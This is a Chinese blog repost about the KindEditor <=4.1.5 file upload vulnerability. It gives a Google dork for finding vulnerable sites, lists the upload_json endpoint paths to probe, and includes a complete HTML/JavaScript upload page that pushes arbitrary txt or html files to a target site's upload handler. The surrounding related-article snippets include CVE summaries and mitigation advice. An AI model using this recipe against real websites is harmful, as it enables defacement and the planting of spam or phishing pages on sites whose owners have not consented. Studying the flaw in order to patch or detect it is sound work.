kindeditor<=4.1.5文件上传漏洞

最新推荐文章于 2021-08-11 17:40:55 发布
最新推荐文章于 2021-08-11 17:40:55 发布
阅读量316 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/someone9/p/10162720.html
版权

最近发现很多网页篡改与暗链都是利用kindeditor编辑器,于是搜了一下kindeditor的漏洞,发现低于4.1.5版本的存在文件上传的漏洞,可以上传txt,html后缀的文档,许多恶意的文档貌似都是这样上传上去的。

但是实际测试过程中还未找到可上传html的站点,txt文档倒是可以上传。做个测试记录

google搜素一些存在的站点 inurl:kindeditor

根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在

/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php

然后查看版本信息http://www.XXX/kindeditor/kindeditor.js

版本是4.1.10可以进行尝试http://www.XXX/kindeditor/asp.net/upload_json.ashx?dir=file存在有必要验证文件 upload_json.* 

/asp/upload_json.asp
/asp.net/upload_json.ashx
/jsp/upload_json.jsp
/php/upload_json.php

playload构造

<html><head>

<title>For TEST</title>

<script src="http://www.XXX/kindeditor/kindeditor.js"></script>

<script>

KindEditor.ready(function(K) {

var uploadbutton = K.uploadbutton({

button : K('#uploadButton')[0],

fieldName : 'imgFile',

url : 'http://www.XXX/kindeditor/asp.net/upload_json.ashx?dir=file',

afterUpload : function(data) {

if (data.error === 0) {

var url = K.formatUrl(data.url, 'absolute');

K('#url').val(url);}

},

});

uploadbutton.fileBox.change(function(e) {

uploadbutton.submit();

});

});

</script></head><body>

<div class="upload">

<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />

<input type="button" id="uploadButton" value="Upload" />

</div>

</body>

</html>

 

上传txt文档有路径地址

 

 在页面端访问

发现一个可以上传html文档的网站

 

转载于:https://www.cnblogs.com/someone9/p/10162720.html

weixin_30252155
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
(CVE-2017-1002024)Kindeditor <=4.1.11 上传漏洞
XZ_______的博客
04-22 222
漏洞存在于kindeditor编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/asp.net,漏洞存在于小于等于kindeditor4.1.11编辑器中。
KindEditor 4.1.10 (2013-11-23)
12-03
KindEditor ASP.NET 本ASP.NET程序是演示程序,建议不要直接在实际项目中使用。 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。 使用方法: 1. 解压zip文件,将所有文件复制到IIS的wwwroot/kindeditor目录下。 2. 将kindeditor/asp.net/bin目录下的dll文件复制到wwwroot/bin目录下。 3. 打开浏览器,输入http://localhost:[P0RT]/kindeditor/asp.net/demo.aspx。
[原创]kindeditor-4.1.5使用demo
u010272299的专栏
10-24 1032
var editor; KindEditor.ready(function (K) { editor = K.create('#txtBody', { cssPath: '../kindeditor-4.1.5/plugins/code/prettify.css', uploadJson: 'uploa
[应用漏洞]KindEditor<=4.1.5 文件上传漏洞利用
不忘初心,护天下安全!
07-23 2562
一、KindEditor KindEditor是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果 二、漏洞介绍 影响版本:KindEditor3.5.2~4.1 简介:Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP等程序。 漏洞存在证明: 根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_jso...
kindeditor在服务器上上传图片显示叉叉,什么原因?,kindeditor<=4.1.5 文件上传漏洞利用...
weixin_26820341的博客
08-11 1140
kindeditor<=4.1.5 文件上传漏洞 - Kindeditor <=4.1.5 file upload vulnerabilityanduse漏洞存影响版本:小于等于4.1.5的kindeditor 编辑器漏洞影响:上传任意. txt 和. html 文件漏洞存在动态脚本语言:php/asp/jsp/asp.net漏洞存在的证明文件:upload_json.* 具体...
php kindeditor 文件不存在_不能取得文件类型!,kindeditor<=4.1.5文件上传漏洞复现
weixin_42318727的博客
03-11 187
原标题:kindeditor<=4.1.5文件上传漏洞复现0x00:背景KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。0x01:漏洞描述漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和.html文件,支持php/asp/jsp/as...
kindeditor-4.1.5.rar
05-28
KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用 KindEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。 KindEditor 使用 JavaScript ...
springmvc+kindeditor文件上传实例详解
08-27
在本文中,我们将深入探讨如何使用Spring MVC框架与KindEditor集成实现文件上传功能。Spring MVC是Java企业级应用中广泛使用的MVC框架,它提供了一种结构化的方式来处理HTTP请求和响应,而KindEditor则是一个功能...
SpringMVC KindEditor在线编辑器之文件上传代码实例
08-25
SpringMVC KindEditor 在线编辑器之文件上传代码实例 SpringMVC KindEditor 在线编辑器是一种流行的在线编辑器,对于文件上传功能的实现非常重要。在本文中,我们将详细介绍如何使用 SpringMVC 框架结合 ...
kindeditor配置和上传文件
08-03
kindeditor极容易在.net里面配置,本方法介绍上传文件盒图片,十分简单,通过测试,假如您觉得好的话,请给五分哦!
kindeditor-4.1.5
03-07
KindEditor 是一套开源的在线HTML编辑器,主要用于让用户在网站上获得所见即所得编辑效果,开发人员可以用 KindEditor 把传统的多行文本输入框(textarea)替换为可视化的富文本输入框。
KindEditor 4.1.11网站实例
03-07
KindEditor是非常好的富媒体文本编辑系统,短小精悍,可惜网上找到的都是有各种问题!一怒之下,我自己进行了修改和配置,搞成了一个网站示例.下载解压后,可以直接运行!!完全无问题.! Kindeditor版本好像官方2012年之后就不更新了,官方最新的为 KindEditor 4.1.1 (2012-06-10), ,我这个网站里的是从qq群里下载的 标明的版本为4.1.11
[渗透]kindeditor4.1.5文件上传漏洞
热门推荐
胖胖的ALEX
03-04 1万+
漏洞等级:高危 Kindeditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器。 漏洞描述: Kindeditor能够上传doc,docx,xls,xlsx,ppt,htm,html,txt,zip,rar,gz,bz2,wps,pdf格式文件。支持 Java、.NET、PHP、ASP...
.net core3.0上传文件出现404_Kindeditor_4.1.11文件上传漏洞复现
weixin_34005314的博客
12-25 696
区区凡人妄想驾驭沙雕之力匠心前言2019年2月份,安全监测平台和应急响应中心监测发现近百起党政机关网站被植入色情广告页面,分析发现被植入色情广告页面的网站都使用了KindEditor编辑器组件。本次安全事件主要由upload_json.*上传功能文件允许被直接调用从而实现上传htm,html,txt等文件到服务器,在实际已监测到的安全事件案例中,上传的htm,html文件中存在包含跳转到...
kindeditor-4.1.10修改与使用(php)
sage425的专栏
12-22 839
kindeditor-4.1.10修改与使用(php) 点击打开链接
kindeditor<=4.1.5文件上传漏洞复现
蚁景网安学院
02-22 587
0x00:背景KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏...
动易html在线编辑器,kindeditor编辑器上传漏洞可能造成网站被植入**广告页面
weixin_34986860的博客
05-31 226
1、 漏洞描述近日,安全监控中心发布高危漏洞预警,使用kindeditor编辑器组件的网站,可能存在上传漏洞造成网站被植入**广告页面。本次安全事件主要由upload_json.*上传功能文件允许被直接调用从而实现上传htm,html,txt等文件到服务器,在实际已监测到的安全事件案例中,上传的htm,html文件中存在包含跳转到**网站的代码,攻击者主要针对党政机关网站实施批量上传,建议使用该组...
kindeditor4.1.11富文本编辑框中图片文件上传服务器,将demo中jsp里的java代码迁移到后台中
stklway的专栏
03-25 408
富文本编辑器kindeditor4.1.11,官网下载后文件目录如下(我这里只保留了java语言开发的jsp包) 将类库放在项目中后就可以开始使用了,以下使用过程中取用路径请自行甄别,如果已经会调用,只想看代码迁移方法请跳转步骤四 步骤一: 在jsp页面中引入类库: <html> <head> <script language="javascript" src="${jsPath}/common/kindeditor4.1.11/kindeditor-all.js
Kindeditor上传漏洞复现(CVE-2017-1002024)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-09 3113
Kindeditor上传漏洞复现(CVE-2017-1002024) 文章目录Kindeditor上传漏洞复现(CVE-2017-1002024)1. 漏洞简述2. 组件概述3. 漏洞原理4. 漏洞复现5. 漏洞验证5. 漏洞修复意见 复现环境土豪专用下载链接 https://download.csdn.net/download/qin9800/18510863 1. 漏洞简述 漏洞名称:Kindeditor上传漏洞 漏洞编号:CVE-2017-1002024 漏洞影响:黑页、钓鱼、XSS等 基础权限
kindeditor 任意文件上传
最新发布
07-27
对于 KindEditor 的任意文件上传漏洞,可以采取以下步骤进行防护: 1. 更新到最新版本:及时更新 KindEditor 到最新版本,以确保修复了已知的漏洞。 2. 文件类型白名单:在服务器端进行文件类型白名单限制,只允许上传特定的安全文件类型,并禁止上传可执行文件、脚本文件等危险文件类型。 3. 文件大小限制:限制上传文件的大小,控制上传文件的大小范围,以防止恶意用户上传过大的文件导致服务器资源耗尽。 4. 文件后缀检查:检查文件后缀是否与实际文件类型一致,避免恶意用户通过修改文件后缀绕过文件类型限制。 5. 文件内容检查:对上传的文件进行内容检查,使用杀毒软件或者自定义规则对上传的文件进行扫描,确保上传的文件没有包含恶意代码。 6. 临时文件处理:将上传的文件保存在非 Web 可访问目录下,并限制访问权限,防止用户直接访问上传的文件。 7. 强制下载:在返回上传成功的链接时,强制浏览器将其当做下载文件处理,而不是直接在浏览器中打开。 8. 日志监控:监控系统日志,及时发现异常行为,并及时采取相应的防护措施。 请注意,以上措施只是一些基本的防护措施,具体的防护策略需要根据实际需求和系统环境来确定。同时,建议定期对系统进行安全审计和漏洞扫描,及时修补已知漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值